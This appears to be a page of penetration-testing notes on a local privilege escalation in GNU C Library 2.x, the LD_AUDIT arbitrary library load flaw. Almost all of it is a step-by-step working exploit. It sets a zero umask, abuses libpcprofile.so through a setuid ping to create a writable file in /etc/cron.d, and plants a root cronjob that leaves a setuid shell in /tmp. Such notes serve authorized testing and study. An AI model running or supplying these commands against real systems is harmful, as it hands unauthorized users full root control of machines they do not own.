# GNU C Library

## GNU C Library 2.x (libc6)

GNU C Library 2.x (libc6) has a privesc exploit:

{% embed url="<https://www.exploit-db.com/exploits/15304>" %}
GNU C Library 2.x (libc6) - Dynamic Linker LD\_AUDIT Arbitrary DSO Load Privilege Escalation
{% endembed %}

## Enumeration

```bash
ldd --version
```

## Exploitation

**Step 1:** The creation mask is inherited by children, and survives even a setuid execve. Therefore, we can influence how files are created during exploitation.

```bash
umask 0
```

**Step 2:** libpcprofile is distributed with the libc package.

```bash
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
```

**Step 3:** We identified one of the pcprofile constructors is unsafe to run with elevated privileges, as it creates the file specified in the output environment variable.

```bash
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ls -l /etc/cron.d/exploit
```

**Step 4:** Setup a cronjob to give us privileges.

```bash
printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit
ls -l /tmp/exploit
```

**Step 5:** Trigger the exploit and get a root shell.

```bash
/tmp/exploit
```